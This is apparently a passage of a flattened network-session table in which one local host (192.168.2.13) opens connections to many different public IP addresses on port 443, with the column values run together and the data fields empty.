                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21216192.168.2.133818062.17.249.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21217192.168.2.1347228138.151.252.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21218192.168.2.1349882165.54.48.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21219192.168.2.1338012113.231.84.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21220192.168.2.1358830213.25.238.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21221192.168.2.1339900147.111.187.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21222192.168.2.1335842116.156.226.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21223192.168.2.135227669.74.111.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21224192.168.2.134869876.70.2.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21225192.168.2.1343576171.163.222.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21226192.168.2.134802283.166.60.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21227192.168.2.134063859.213.83.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21228192.168.2.1339818161.208.109.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21229192.168.2.133687843.50.145.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21230192.168.2.1345654103.40.114.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21231192.168.2.1341876209.45.173.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21232192.168.2.1360560148.92.206.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21233192.168.2.1360962114.223.59.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21234192.168.2.134313818.20.58.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21235192.168.2.1347618209.153.3.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21236192.168.2.1340286140.174.84.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21237192.168.2.1345406103.21.247.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21238192.168.2.1358746137.237.125.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21239192.168.2.1354762110.194.201.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21240192.168.2.1356852184.118.17.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21241192.168.2.1345730116.16.57.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21242192.168.2.134369260.198.171.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21243192.168.2.1350036113.126.79.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21244192.168.2.134628068.192.221.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21245192.168.2.135070896.124.125.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21246192.168.2.133765254.217.218.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21247192.168.2.133829293.136.93.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21248192.168.2.1337324167.186.139.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21249192.168.2.1347416221.157.134.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21250192.168.2.1352418166.118.138.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21251192.168.2.1350512128.193.232.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21252192.168.2.1350516170.193.142.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21253192.168.2.1344398144.48.82.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21254192.168.2.135976070.167.46.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21255192.168.2.1343788195.152.195.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21256192.168.2.1340618193.203.50.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21257192.168.2.1358074152.35.86.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21258192.168.2.133810691.165.68.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21259192.168.2.1336312146.87.237.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21260192.168.2.1360360152.204.104.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21261192.168.2.1357348115.113.141.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21262192.168.2.133929677.253.210.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21263192.168.2.135438012.137.205.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21264192.168.2.1357244118.250.21.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21265192.168.2.134506217.182.219.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21266192.168.2.1355512197.215.232.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21267192.168.2.1360444167.231.62.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21268192.168.2.1359190142.180.245.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21269192.168.2.1333518147.248.207.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21270192.168.2.1344836104.114.57.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21271192.168.2.1348820152.4.248.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21272192.168.2.1354584171.37.126.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21273192.168.2.133898869.43.234.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21274192.168.2.134894817.74.157.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21275192.168.2.135204442.38.168.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21276192.168.2.134182680.100.131.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21277192.168.2.1337870145.86.255.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21278192.168.2.133469899.132.254.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21279192.168.2.1359688125.59.20.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21280192.168.2.1348544155.111.121.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21281192.168.2.133838840.219.131.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21282192.168.2.135020088.214.153.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21283192.168.2.1341682161.19.204.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21284192.168.2.1336966137.209.120.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21285192.168.2.1336322109.7.192.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21286192.168.2.134552053.254.140.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21287192.168.2.1358976160.152.192.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21288192.168.2.1345172153.83.163.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21289192.168.2.13417622.104.39.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21290192.168.2.135174270.11.171.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21291192.168.2.135862293.50.245.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21292192.168.2.1346528111.243.190.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21293192.168.2.135343444.230.20.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21294192.168.2.1353352219.22.168.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21295192.168.2.1354758171.40.205.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21296192.168.2.1357256172.226.113.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21297192.168.2.135111243.64.77.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21298192.168.2.1360778131.80.36.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21299192.168.2.134808476.135.97.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21300192.168.2.1354564140.94.161.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21301192.168.2.1335794210.247.19.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21302192.168.2.1342288161.209.224.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21303192.168.2.1360982114.101.49.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21304192.168.2.1335362145.255.111.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21305192.168.2.1355284103.224.205.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21306192.168.2.1360368141.6.16.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21307192.168.2.133756014.137.56.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21308192.168.2.1339730202.250.171.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21309192.168.2.1338184103.173.12.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21310192.168.2.1346708100.27.245.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21311192.168.2.1353424144.252.219.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21312192.168.2.1359200174.94.152.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21313192.168.2.1342210117.75.64.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21314192.168.2.1346994208.229.148.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21315192.168.2.1352358126.157.227.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21316192.168.2.1360608219.33.198.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21317192.168.2.1336254191.95.242.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21318192.168.2.1333314143.226.13.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21319192.168.2.135990272.220.210.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21320192.168.2.133662658.154.179.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21321192.168.2.1355976210.43.56.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21322192.168.2.133656625.203.197.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21323192.168.2.1342996178.224.74.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21324192.168.2.1334688181.92.103.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21325192.168.2.135572067.160.37.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21326192.168.2.135694414.69.245.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21327192.168.2.1336158223.162.25.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21328192.168.2.1334642128.4.93.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21329192.168.2.1342330161.143.75.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21330192.168.2.1352140199.33.25.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21331192.168.2.1339530200.204.79.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21332192.168.2.13329321.172.4.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21333192.168.2.135316495.243.56.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21334192.168.2.133889845.191.73.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21335192.168.2.134158019.43.244.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21336192.168.2.135319080.52.80.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21337192.168.2.1354004103.184.52.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21338192.168.2.1349762168.230.121.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21339192.168.2.133485818.81.73.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21340192.168.2.1347058182.36.191.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21341192.168.2.1346258191.179.155.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21342192.168.2.1341586115.36.71.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21343192.168.2.1350454152.238.105.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21344192.168.2.135810453.140.16.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21345192.168.2.1357794213.187.206.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21346192.168.2.1358220163.89.238.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21347192.168.2.134147879.191.69.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21348192.168.2.1344326121.159.251.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21349192.168.2.134782845.158.223.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21350192.168.2.135835460.173.11.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21351192.168.2.1360062170.99.52.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21352192.168.2.1336402221.222.201.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21353192.168.2.134400843.24.47.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21354192.168.2.135330878.133.68.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21355192.168.2.1340046181.51.214.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21356192.168.2.135668692.23.93.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21357192.168.2.136062223.83.122.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21358192.168.2.133999214.49.11.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21359192.168.2.1333738178.127.140.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21360192.168.2.134122239.143.207.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21361192.168.2.134203484.184.11.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21362192.168.2.1350096136.238.41.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21363192.168.2.135929244.139.23.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21364192.168.2.1360350151.20.78.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21365192.168.2.1351412169.219.56.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21366192.168.2.13377149.194.94.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21367192.168.2.134544272.110.84.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21368192.168.2.133634423.103.77.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21369192.168.2.1353374116.182.5.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21370192.168.2.1359364198.166.16.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21371192.168.2.1340470120.79.7.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21372192.168.2.134857813.240.2.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21373192.168.2.134650074.69.239.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21374192.168.2.1339124124.89.35.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21375192.168.2.133373485.49.108.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21376192.168.2.134887850.117.34.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21377192.168.2.1345042200.252.21.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21378192.168.2.1340936184.48.246.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21379192.168.2.1342280154.54.43.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21380192.168.2.135248013.79.222.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21381192.168.2.135414620.31.19.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21382192.168.2.135781638.150.32.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21383192.168.2.1350576169.140.140.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21384192.168.2.1336238105.28.199.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21385192.168.2.135632236.156.62.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21386192.168.2.135617263.205.215.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21387192.168.2.1337702193.244.217.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21388192.168.2.1342612219.238.27.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21389192.168.2.135758663.51.64.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21390192.168.2.135483442.103.39.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21391192.168.2.1360896193.7.155.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21392192.168.2.133574691.53.82.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21393192.168.2.135499451.112.223.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21394192.168.2.134901673.117.206.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21395192.168.2.1351574166.22.8.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21396192.168.2.134817470.120.53.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21397192.168.2.1339738138.124.84.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21398192.168.2.135310813.57.203.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21399192.168.2.135165614.216.180.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21400192.168.2.1349546162.51.61.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21401192.168.2.134684220.59.40.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21402192.168.2.135027872.135.152.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21403192.168.2.1356906198.250.183.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21404192.168.2.1350958156.2.250.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21405192.168.2.1349504210.250.117.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21406192.168.2.134750435.43.74.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21407192.168.2.1354358162.245.229.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21408192.168.2.135741651.5.139.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21409192.168.2.135964257.120.155.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21410192.168.2.1350044106.102.107.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21411192.168.2.1346508165.100.254.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21412192.168.2.1340888208.71.110.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21413192.168.2.1360294159.76.162.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21414192.168.2.1354180213.229.43.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21415192.168.2.1354786145.123.23.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21416192.168.2.134457476.100.24.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21417192.168.2.1351424184.205.7.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21418192.168.2.1356438144.254.66.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21419192.168.2.1340646222.158.250.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21420192.168.2.13589342.217.197.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21421192.168.2.1338608223.49.119.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21422192.168.2.135107686.125.39.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21423192.168.2.1339576198.31.210.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21424192.168.2.1345284179.28.115.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21425192.168.2.1335030132.176.45.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21426192.168.2.1341068151.83.216.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21427192.168.2.1360008192.41.176.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21428192.168.2.135016698.42.135.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21429192.168.2.1351396192.33.29.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21430192.168.2.1360436183.187.86.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21431192.168.2.1355842156.195.36.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21432192.168.2.135237650.147.223.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21433192.168.2.1341582201.132.52.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21434192.168.2.1346732131.78.195.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21435192.168.2.1350714195.111.23.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21436192.168.2.133935868.253.226.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
